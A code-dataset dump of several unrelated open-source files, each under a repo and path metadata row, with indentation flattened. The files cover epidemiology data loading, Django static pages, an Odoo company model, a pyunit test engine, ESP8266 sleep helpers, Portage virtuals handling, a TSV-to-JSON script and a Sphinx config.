AugustC/project-epidemio | src/dataset.py | 1 | 2112 | # -*- coding: latin-1 -*-
import pandas as pd
import numpy as np
first_year = 2000
last_year = 2013
def read_raw_input(filename):
# Receive the raw input from filename.csv and return the panda time series
dataset = pd.read_csv(filename, sep=';', encoding='latin-1')
labels = dataset.keys()
city_label = labels[0]
cities = dataset[city_label]
weeks_str = labels[1:]
weeks_int = weeks_str.map(int)
years = np.unique(np.floor(weeks_int/100))
matrix = np.empty((0, 52))
tuples_cityear = []
for cityI in range(len(cities)):
for year in years:
tuples_cityear.append((cities[cityI],str(int(year)))) # index
notified = []
for week in weeks_int:
if (week >= year * 100 and week < (year + 1) * 100):
notified.append(dataset.get_value(cityI, str(week)))
if len(notified) > 52:
notified = notified[:52] # limit the amount of weeks in a year to 52
matrix = np.vstack((matrix, notified))
index = pd.MultiIndex.from_tuples(tuples_cityear, names=['Cidade', 'Ano'])
series = pd.DataFrame(matrix, index=index)
series = series.T.unstack()
return series
def read_frequency_input(filename):
# Receive the frequency input from filename.csv and return the panda time series
df = pd.read_csv(filename, sep=';')
dataset = df.set_index(["Cidade", "Ano"])
series = dataset.T.unstack()
return series
def read_population(filename):
# Receive the file with the cities and number of inhabitants
d = {}
with open(filename, encoding="latin-1") as f:
for line in f:
(key, val) = line.split(";")
d[key] = int(val)
return d
def weight_population(dataset, population):
# Function that receives a dataset of the disease and the population of each city
# and returns a disease frequency series, weighted by the population of each city
cities = dataset.index.levels[0]
for city in cities:
dataset.T[city] = dataset.T[city]/population[city]
return dataset
| mit | -2,772,738,059,270,581,000 | 34.2 | 85 | 0.624053 | false |
ehsan/airmozilla | airmozilla/staticpages/views.py | 10 | 2987 | # Adapted from django.contrib.flatpages.middleware
from django.conf import settings
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404, render
from django.template import loader, RequestContext, Template
from django.utils.safestring import mark_safe
from airmozilla.main.models import Event
from .models import StaticPage
DEFAULT_TEMPLATE = 'staticpages/default.html'
def staticpage(request, url):
if not url.startswith('/'):
url = '/' + url
try:
f = get_object_or_404(StaticPage, url__exact=url)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(StaticPage, url__exact=url)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_staticpage(request, f)
def render_staticpage(request, staticpage):
if not can_view_staticpage(staticpage, request.user):
# We might need to kick you out if you're not allowed to see this.
response = render(
request,
'staticpages/insufficient_privileges.html', {
'staticpage': staticpage,
},
status=403,
)
return response
if staticpage.template_name:
t = loader.select_template(
(staticpage.template_name, DEFAULT_TEMPLATE)
)
else:
t = loader.get_template(DEFAULT_TEMPLATE)
if staticpage.allow_querystring_variables:
title_t = Template(staticpage.title)
content_t = Template(staticpage.content)
params = {}
for key, value in request.REQUEST.items():
if key.startswith('request'):
continue
params[key] = value
context = RequestContext(request, params)
staticpage.title = title_t.render(context)
staticpage.content = content_t.render(context)
else:
# To avoid having to always use the "|safe" filter in flatpage
# templates, mark the title and content as already safe (since
# they are raw HTML content in the first place).
staticpage.title = mark_safe(staticpage.title)
staticpage.content = mark_safe(staticpage.content)
c = RequestContext(request, {
'staticpage': staticpage,
})
response = HttpResponse(t.render(c))
for key, value in staticpage.headers.items():
response[key] = value
# print repr(staticpage.headers)
# if staticpage.cors_header:
# response['Access-Control-Allow-Origin'] = staticpage.cors_header
return response
def can_view_staticpage(page, user):
if page.privacy == Event.PRIVACY_PUBLIC:
return True
if not user.is_active:
return False
from airmozilla.main.views import is_contributor
if page.privacy == Event.PRIVACY_COMPANY:
if is_contributor(user):
return False
return True
| bsd-3-clause | -160,157,908,733,099,840 | 31.467391 | 76 | 0.646803 | false |
iw3hxn/LibrERP | core_extended/models/company.py | 1 | 1654 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Author: Didotech SRL
# Copyright 2014 Didotech SRL
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class res_company(orm.Model):
_inherit = 'res.company'
def write(self, cr, uid, ids, values, context=None):
if not ids:
return False
if isinstance(ids, (int, long)):
ids = [ids]
res = super(res_company, self).write(cr, uid, ids, values, context=context)
if values.get('currency_id', False):
product_price_type_obj = self.pool['product.price.type']
product_price_type_ids = product_price_type_obj.search(cr, uid, [], context=context)
product_price_type_obj.write(cr, uid, product_price_type_ids, {'currency_id': values.get('currency_id')}, context=context)
return res
| agpl-3.0 | 6,659,984,753,844,151,000 | 37.465116 | 134 | 0.602781 | false |
Shao-Feng/testkit-lite | testkitlite/engines/pyunit.py | 4 | 5751 | #!/usr/bin/python
#
# Copyright (C) 2012 Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Authors:
# Chengtao,Liu <[email protected]>
""" The implementation of pyunit test engine"""
import os
import time
import sys
import threading
import uuid
import StringIO
import unittest
from unittest import TestResult
from datetime import datetime
from testkitlite.util.log import LOGGER
from testkitlite.util.result import TestSetResut
DATE_FORMAT_STR = "%Y-%m-%d %H:%M:%S"
result_buffer = None
class LiteTestResult(TestResult):
"""Python unittest result wrapper"""
def startTest(self, test):
super(LiteTestResult, self).startTest(test)
self._case = {}
case_full_id = test.id()
self._case['case_id'] = case_full_id
self._case['start_at'] = datetime.now().strftime(DATE_FORMAT_STR)
def stopTest(self, test):
self._case['end_at'] = datetime.now().strftime(DATE_FORMAT_STR)
super(LiteTestResult, self).stopTest(test)
if result_buffer is not None:
result_buffer.extend_result([self._case])
def addSuccess(self, test):
super(LiteTestResult, self).addSuccess(test)
self._case['result'] = 'PASS'
def addError(self, test, err):
super(LiteTestResult, self).addError(test, err)
_, _exc_str = self.errors[-1]
self._case['result'] = 'BLOCK'
self._case['stdout'] = '[message]' + _exc_str
def addFailure(self, test, err):
super(LiteTestResult, self).addFailure(test, err)
_, _exc_str = self.failures[-1]
self._case['result'] = 'FAIL'
self._case['stdout'] = '[message]' + _exc_str
def _pyunit_test_exec(test_session, cases, result_obj):
"""function for running core tests"""
global result_buffer
result_buffer = result_obj
result_obj.set_status(0)
total = unittest.TestSuite()
for tc in cases['cases']:
if tc['entry'].find(os.sep) != -1:
arr = tc['entry'].split(os.sep)
path = tc['entry'][:tc['entry'].rindex(os.sep)]
case = arr[-1]
else:
path = os.getcwd()
case = tc['entry']
try:
tests = unittest.TestLoader().discover(path, pattern='''%s''' %case)
total.addTest(tests)
# unittest.TextTestRunner(resultclass=LiteTestResult, buffer=True).run(tests)
except ImportError as error:
pass
try:
unittest.TextTestRunner(resultclass=LiteTestResult, buffer=True).run(total)
except ImportError as error:
pass
#result_obj.extend_result(resultclass)
result_obj.set_status(1)
class TestWorker(object):
"""Test executor for testkit-lite"""
def __init__(self, conn):
super(TestWorker, self).__init__()
self.conn = conn
self.server_url = None
self.result_obj = None
self.opts = dict({'block_size': 300,
'test_type': None,
'auto_iu': False,
'fuzzy_match': False,
'self_exec': False,
'self_repeat': False,
'debug_mode': False
})
def init_test(self, params):
"""init the test envrionment"""
self.opts['testset_name'] = params.get('testset-name', '')
self.opts['testsuite_name'] = params.get('testsuite-name', '')
self.opts['debug_log_base'] = params.get("debug-log-base", '')
return str(uuid.uuid1())
def run_test(self, sessionid, test_set):
"""
process the execution for a test set
"""
if sessionid is None:
return False
disabledlog = os.environ.get("disabledlog","")
# start debug trace thread
if len(disabledlog) > 0 :
pass
else:
self.conn.start_debug(self.opts['debug_log_base'])
time.sleep(1)
self.result_obj = TestSetResut(
self.opts['testsuite_name'], self.opts['testset_name'])
# self.opts['async_th'] = threading.Thread(
# target=_pyunit_test_exec,
# args=(sessionid, test_set['test_set_src'], test_set, self.result_obj)
# )
self.opts['async_th'] = threading.Thread(
target=_pyunit_test_exec,
args=(sessionid, test_set, self.result_obj)
)
self.opts['async_th'].start()
return True
def get_test_status(self, sessionid):
"""poll the test task status"""
if sessionid is None:
return None
result = {}
result["msg"] = []
result["finished"] = str(self.result_obj.get_status())
return result
def get_test_result(self, sessionid):
"""get the test result for a test set """
result = {}
if sessionid is None:
return result
result = self.result_obj.get_result()
return result
def finalize_test(self, sessionid):
"""clear the test stub and related resources"""
if sessionid is None:
return False
if self.result_obj is not None:
self.result_obj.set_status(1)
# stop debug thread
self.conn.stop_debug()
return True
| gpl-2.0 | 2,795,866,676,022,362,600 | 31.308989 | 88 | 0.586854 | false |
dan-cristian/haiot | apps/esp8266_vent_motor/common.py | 1 | 2605 | # https://github.com/micropython/micropython/issues/2352
import esp
from flashbdev import bdev
import machine
import ujson
import mqtt
ADC_MODE_VCC = 255
ADC_MODE_ADC = 0
rtc = machine.RTC()
class rtc_storage:
mqtts = 0
mqttp = 0
closed = 1
angle = 0
def set_adc_mode(mode):
sector_size = bdev.SEC_SIZE
flash_size = esp.flash_size() # device dependent
init_sector = int(flash_size / sector_size - 4)
data = bytearray(esp.flash_read(init_sector * sector_size, sector_size))
if data[107] == mode:
return # flash is already correct; nothing to do
else:
data[107] = mode # re-write flash
esp.flash_erase(init_sector)
esp.flash_write(init_sector * sector_size, data)
print("ADC mode changed in flash; restart to use it!")
return
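# Illustrative sketch (added for clarity; this exact call sequence is an
# assumption about how the helper is meant to be used): the new ADC mode only
# takes effect after a restart, as the message above notes.
def _example_switch_to_vcc_mode():  # hypothetical helper, never called here
    set_adc_mode(ADC_MODE_VCC)  # rewrite byte 107 of the init sector
    machine.reset()             # restart so the rewritten flash byte is used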
def init_deep_sleep(sleep_sec=60):
# configure RTC.ALARM0 to be able to wake the device
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
# set RTC.ALARM0 to fire after 60 seconds (waking the device)
rtc.alarm(rtc.ALARM0, sleep_sec * 1000)
save_rtc()
# mqtt.disconnect()
print("Entering deep sleep")
machine.deepsleep()
def save_rtc():
try:
stor_dict = rtc_storage.__dict__.copy() # needs a copy otherwise pop won't work
# print("Saving dict {}".format(stor_dict))
stor_dict.pop("__module__", None)
stor_dict.pop("__qualname__", None)
json = ujson.dumps(stor_dict)
print("Saving to rtc: {}".format(json))
rtc.memory(json)
except Exception as ex:
print("Unable to save rtc, ex={}".format(ex))
def read_rtc():
mem = rtc.memory()
print("Reading from rtc: {}".format(mem))
if mem is not None and len(mem) > 0:
mems = str(mem, "utf-8") # replace("b'{", "{").replace("}'", "}")
try:
obj = ujson.loads(mems)
if type(obj) is dict:
for key in obj.keys():
setattr(rtc_storage, key, obj[key])
# P.closed = int(mem)
print("Read rtc memory closed={} sub={} pub={}".format(
rtc_storage.closed, rtc_storage.mqtts, rtc_storage.mqttp))
else:
print("Unexpected rtc object type {}".format(obj))
except ValueError as ve:
print("Unable to convert from rtc json: {}, json was:{}".format(ve, mems))
def publish_state():
vcc = machine.ADC(1).read()
# send current state to mqtt
mqtt.publish('{{"vcc": {},"angle": {}, "mqttp": {}}}'.format(
vcc, rtc_storage.angle, rtc_storage.mqttp))
| gpl-2.0 | 8,380,810,964,129,800,000 | 30.385542 | 88 | 0.588868 | false |
hackers-terabit/portage | pym/portage/package/ebuild/_config/VirtualsManager.py | 16 | 6654 | # Copyright 2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = (
'VirtualsManager',
)
from copy import deepcopy
from portage import os
from portage.dep import Atom
from portage.exception import InvalidAtom
from portage.localization import _
from portage.util import grabdict, stack_dictlist, writemsg
from portage.versions import cpv_getkey
class VirtualsManager(object):
def __init__(self, *args, **kwargs):
if kwargs.get("_copy"):
return
assert len(args) == 1, "VirtualsManager.__init__ takes one positional argument"
assert not kwargs, "unknown keyword argument(s) '%s' passed to VirtualsManager.__init__" % \
", ".join(kwargs)
profiles = args[0]
self._virtuals = None
self._dirVirtuals = None
self._virts_p = None
# Virtuals obtained from the vartree
self._treeVirtuals = None
# Virtuals added by the depgraph via self.add_depgraph_virtuals().
self._depgraphVirtuals = {}
#Initialise _dirVirtuals.
self._read_dirVirtuals(profiles)
#We could initialise _treeVirtuals here, but some consumers want to
#pass their own vartree.
def _read_dirVirtuals(self, profiles):
"""
Read the 'virtuals' file in all profiles.
"""
virtuals_list = []
for x in profiles:
virtuals_file = os.path.join(x, "virtuals")
virtuals_dict = grabdict(virtuals_file)
atoms_dict = {}
for k, v in virtuals_dict.items():
try:
virt_atom = Atom(k)
except InvalidAtom:
virt_atom = None
else:
if virt_atom.blocker or \
str(virt_atom) != str(virt_atom.cp):
virt_atom = None
if virt_atom is None:
writemsg(_("--- Invalid virtuals atom in %s: %s\n") % \
(virtuals_file, k), noiselevel=-1)
continue
providers = []
for atom in v:
atom_orig = atom
if atom[:1] == '-':
# allow incrementals
atom = atom[1:]
try:
atom = Atom(atom)
except InvalidAtom:
atom = None
else:
if atom.blocker:
atom = None
if atom is None:
writemsg(_("--- Invalid atom in %s: %s\n") % \
(virtuals_file, atom_orig), noiselevel=-1)
else:
if atom_orig == str(atom):
# normal atom, so return as Atom instance
providers.append(atom)
else:
# atom has special prefix, so return as string
providers.append(atom_orig)
if providers:
atoms_dict[virt_atom] = providers
if atoms_dict:
virtuals_list.append(atoms_dict)
self._dirVirtuals = stack_dictlist(virtuals_list, incremental=True)
for virt in self._dirVirtuals:
# Preference for virtuals decreases from left to right.
self._dirVirtuals[virt].reverse()
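    # Illustrative sketch (an assumed example, not shipped with this code): a
    # profile "virtuals" file maps an old-style virtual to its providers, e.g.
    #
    #     virtual/editor  app-editors/nano app-editors/vim
    #
    # Each such line is parsed into {Atom('virtual/editor'): [provider atoms]},
    # the per-profile dicts are stacked across profiles, and each provider list
    # is then reversed as above.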
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
result = VirtualsManager(_copy=True)
memo[id(self)] = result
# immutable attributes (internal policy ensures lack of mutation)
        # _treeVirtuals is initialised by _populate_treeVirtuals().
# Before that it's 'None'.
result._treeVirtuals = self._treeVirtuals
memo[id(self._treeVirtuals)] = self._treeVirtuals
        # _dirVirtuals is initialised by __init__.
result._dirVirtuals = self._dirVirtuals
memo[id(self._dirVirtuals)] = self._dirVirtuals
# mutable attributes (change when add_depgraph_virtuals() is called)
result._virtuals = deepcopy(self._virtuals, memo)
result._depgraphVirtuals = deepcopy(self._depgraphVirtuals, memo)
result._virts_p = deepcopy(self._virts_p, memo)
return result
def _compile_virtuals(self):
"""Stack installed and profile virtuals. Preference for virtuals
decreases from left to right.
Order of preference:
1. installed and in profile
2. installed only
3. profile only
"""
assert self._treeVirtuals is not None, "_populate_treeVirtuals() must be called before " + \
"any query about virtuals"
# Virtuals by profile+tree preferences.
ptVirtuals = {}
for virt, installed_list in self._treeVirtuals.items():
profile_list = self._dirVirtuals.get(virt, None)
if not profile_list:
continue
for cp in installed_list:
if cp in profile_list:
ptVirtuals.setdefault(virt, [])
ptVirtuals[virt].append(cp)
virtuals = stack_dictlist([ptVirtuals, self._treeVirtuals,
self._dirVirtuals, self._depgraphVirtuals])
self._virtuals = virtuals
self._virts_p = None
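    # Worked illustration of the docstring's ordering (hypothetical packages):
    # if virtual/editor has app-editors/vim installed and both vim and nano in
    # the profile, vim is "installed and in profile" and sorts first; a provider
    # that was installed but absent from the profile would come next, and
    # profile-only providers such as nano come last.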
def getvirtuals(self):
"""
Computes self._virtuals if necessary and returns it.
self._virtuals is only computed on the first call.
"""
if self._virtuals is None:
self._compile_virtuals()
return self._virtuals
def _populate_treeVirtuals(self, vartree):
"""
Initialize _treeVirtuals from the given vartree.
It must not have been initialized already, otherwise
our assumptions about immutability don't hold.
"""
assert self._treeVirtuals is None, "treeVirtuals must not be reinitialized"
self._treeVirtuals = {}
for provide, cpv_list in vartree.get_all_provides().items():
try:
provide = Atom(provide)
except InvalidAtom:
continue
self._treeVirtuals[provide.cp] = \
[Atom(cpv_getkey(cpv)) for cpv in cpv_list]
def populate_treeVirtuals_if_needed(self, vartree):
"""
Initialize _treeVirtuals if it hasn't been done already.
        This is a hack for consumers that already have a populated vartree.
"""
if self._treeVirtuals is not None:
return
self._populate_treeVirtuals(vartree)
def add_depgraph_virtuals(self, mycpv, virts):
"""This updates the preferences for old-style virtuals,
affecting the behavior of dep_expand() and dep_check()
calls. It can change dbapi.match() behavior since that
calls dep_expand(). However, dbapi instances have
internal match caches that are not invalidated when
preferences are updated here. This can potentially
lead to some inconsistency (relevant to bug #1343)."""
#Ensure that self._virtuals is populated.
if self._virtuals is None:
self.getvirtuals()
modified = False
cp = Atom(cpv_getkey(mycpv))
for virt in virts:
try:
virt = Atom(virt).cp
except InvalidAtom:
continue
providers = self._virtuals.get(virt)
if providers and cp in providers:
continue
providers = self._depgraphVirtuals.get(virt)
if providers is None:
providers = []
self._depgraphVirtuals[virt] = providers
if cp not in providers:
providers.append(cp)
modified = True
if modified:
self._compile_virtuals()
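    # Usage sketch (hypothetical values, not called anywhere in this module):
    #     vman.add_depgraph_virtuals('app-editors/vim-7.4', ['virtual/editor'])
    # registers app-editors/vim as an extra provider of virtual/editor unless it
    # is already preferred, then recompiles the stacked virtuals mapping.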
def get_virts_p(self):
if self._virts_p is not None:
return self._virts_p
virts = self.getvirtuals()
virts_p = {}
for x in virts:
vkeysplit = x.split("/")
if vkeysplit[1] not in virts_p:
virts_p[vkeysplit[1]] = virts[x]
self._virts_p = virts_p
return virts_p
| gpl-2.0 | 1,610,628,014,105,041,000 | 27.55794 | 94 | 0.685152 | false |
cbingos/cpro | cpro/settings.py | 1 | 10357 | # -*- coding: utf-8 -*-
import os
import sys
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#PREPEND_WWW = True  # 301 redirect to www
APPEND_SLASH = True  # append a trailing "/" to URLs
ADMINS = (
('cbin', '[email protected]'),
)
ADMIN_EXPORTERS = (
# 'djadmin_export.exporters.xlsx.XLSXExporter',
)
MANAGERS = ADMINS
dbpath = os.path.dirname(os.path.dirname(__file__))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'cpro', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'ruoxuan12', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306',
'AUTOCOMMIT': True,
#'NAME': 'sqlite3-db',
#'ATOMIC_REQUESTS': True, # Set to empty string for default. Not used with sqlite3.
}
}
if 'testserver' in sys.argv:
DATABASES['default']['TEST_NAME'] = '%s/TEST_cpro.db'%dbpath
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
#USE_TZ=False
TIME_ZONE = 'Asia/Shanghai'#'Atlantic/St_Helena'#'Asia/Shanghai'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en//ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'zh-cn'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
HERE = os.path.dirname(os.path.dirname(__file__))
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
#MEDIA_ROOT = os.path.join( HERE ,'media').replace('\\','/')
#MEDIA_ROOT = HERE
#MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(HERE,'static').replace('\\','/')
MEDIA_ROOT = os.path.join(HERE,'media').replace('\\','/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(HERE,'/static/').replace('\\','/'),
("images", os.path.join(STATIC_ROOT, 'images')),
('js', os.path.join(STATIC_ROOT, 'js')),
('css', os.path.join(STATIC_ROOT, 'css')),
('admin',os.path.join(STATIC_ROOT,'admin')),
('grappelli', os.path.join(STATIC_ROOT, 'grappelli')),
#('ueditor', os.path.join(STATIC_ROOT, 'ueditor')),
#('xadmin', os.path.join(STATIC_ROOT, 'xadmin')),
('nvd3', os.path.join(STATIC_ROOT, 'nvd3')),
('filebrowser', os.path.join(STATIC_ROOT, 'filebrowser')),
('d3', os.path.join(STATIC_ROOT, 'd3')),
("uploads", os.path.join(MEDIA_ROOT, 'upload')),
('upimages',os.path.join(MEDIA_ROOT, '../media/upimages')),
("thumbnail", os.path.join(MEDIA_ROOT, 'thumbnail')),
#("upfile",os.path.join(MEDIA_ROOT,'upfile'))
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'g2xqy*_3dwwv-81eav#^(=rf=+*snvy6=pk#+hn88^a9ii*%5s'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
'django.contrib.messages.context_processors.messages',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.transaction.TransactionMiddleware',
'pagination.middleware.PaginationMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'cpro.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'cpro.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
#'profiles',
#'DjangoUeditor',
'haystack',
'mptt',
'taggit',
'registration',
'pagination',
'ems',
'projectchart',
'easy_thumbnails',
'grappelli.dashboard',
'grappelli',
'filebrowser',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_cn_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'whoosh_index'),
'STORAGE': 'file',
'POST_LIMIT': 128 * 1024 * 1024,
'INCLUDE_SPELLING': True,
'BATCH_SIZE': 100,
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
THUMBNAIL_ALIASES = {
'': {
'avar': {'size': (50, 50), 'crop': True},
},
}
GRAPPELLI_ADMIN_TITLE=u"后台管理系统"
GRAPPELLI_INDEX_DASHBOARD = 'cpro.cprodashboard.CustomIndexDashboard'
from django.conf import settings
MEDIA_ROOT = getattr(settings, "FILEBROWSER_MEDIA_ROOT", settings.MEDIA_ROOT)
MEDIA_URL = getattr(settings, "FILEBROWSER_MEDIA_URL", settings.MEDIA_URL)
DIRECTORY = getattr(settings, "FILEBROWSER_DIRECTORY", 'uploads/')
EXTENSIONS = getattr(settings, "FILEBROWSER_EXTENSIONS", {
#'Folder': [''],
'Image': ['.jpg','.jpeg','.gif','.png','.tif','.tiff'],
'Document': ['.pdf','.doc','.rtf','.txt','.xls','.csv'],
'Video': ['.mov','.wmv','.mpeg','.mpg','.avi','.rm','flv',],
'Audio': ['.mp3','.mp4','.wav','.aiff','.midi','.m4p']
})
SELECT_FORMATS = getattr(settings, "FILEBROWSER_SELECT_FORMATS", {
'file': ['Image','Document','Video','Audio'],
'image': ['Image'],
'document': ['Document'],
'media': ['Video','Audio'],
})
#ACCOUNT_ACTIVATION_DAYS = 7
#for registration activation days
SIGNUP_ACTIVATION_DAYS = 7
# signup activation days
AUTH_PROFILE_MODULE = "userprofile.UserProfile"
"""
#email setting
FAILED_RUNS_CRONJOB_EMAIL_PREFIX = "[email protected]"
EMAIL_HOST = 'smtp.webfaction.com'
EMAIL_HOST_USER = 'cbingo '
EMAIL_HOST_PASSWORD = 'Xuan20120419'
DEFAULT_FROM_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
"""
"""
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
UEDITOR_SETTINGS={
"toolbars":{ #定义多个工具栏显示的按钮,允行定义多个
"name1":[[ 'source', '|','bold', 'italic', 'underline']],
"name2":[],
},
"images_upload":{
"allow_type":"jpg,png,gif,jpeg,gif", #定义允许的上传的图片类型
"path":"upimages", #定义默认的上传路径
"max_size":"22220kb" #定义允许上传的图片大小,0代表不限制
},
"files_upload":{
"allow_type":"zip,rar", #定义允许的上传的文件类型
"path":'upload',#定义默认的上传路径
"max_size":"22220kb",#定义允许上传的文件大小,0代表不限制
},
"image_manager":{
"path":"upimages",#图片管理器的位置,如果没有指定,默认跟图片路径上传一样
},
"scrawl_upload":{
"path":"upimages" #涂鸦图片默认的上传路径
}
}"""
| mit | 8,115,872,049,929,756,000 | 35.003571 | 111 | 0.627716 | false |
tzolov/hortonworks-gallery.github.io | tsv_import.py | 2 | 1157 | #!/usr/bin/python
import sys
import csv
import json
tsvProjectFile = open(sys.argv[1], 'r')
projectFile = open('src/projects/repos.json', 'w')
fieldnames = ("projectTitle","projectDescription","featured","category","subcategory", "url", "repoAccount", "repoName", "buttonText", "included", "contributors")
reader = csv.DictReader( tsvProjectFile, fieldnames, delimiter='\t')
reader.next()
projectFile.write("[")
items = []
for row in reader:
if row["included"] == "TRUE":
category = "{\"categories\": [{\"name\": \""+row["category"]+"\"}," + "{\"name\": \""+row["subcategory"]+"\"}"
if row["featured"] == "TRUE":
category += ",{\"name\": \"featured\"}"
category += "]"
items.append(category + ", \"title\": \"" + row["projectTitle"] + "\", \"description\": \"" + row["projectDescription"] + "\", \"cta_1_url\": \"" + row["url"] + "\", \"cta_1_text\": \"" + row["buttonText"] + "\", \"repo_account\": \"" + row["repoAccount"] + "\", \"repo_name\": \"" + row["repoName"] + "\", \"contributors\": \"" + row["contributors"] + "\"}\n")
projectFile.write(",".join(items))
projectFile.write("]")
projectFile.close() | apache-2.0 | 6,400,279,880,035,483,000 | 49.347826 | 369 | 0.576491 | false |
pluralsight/guides-cms | docs/conf.py | 2 | 8657 | # -*- coding: utf-8 -*-
#
# Hacker-guides CMS documentation build configuration file, created by
# sphinx-quickstart on Thu Nov 19 08:51:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'alabaster',
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hacker Guides CMS'
copyright = u'2016, Pluralsight LLC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.1'
# The full version, including alpha/beta/rc tags.
release = '.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
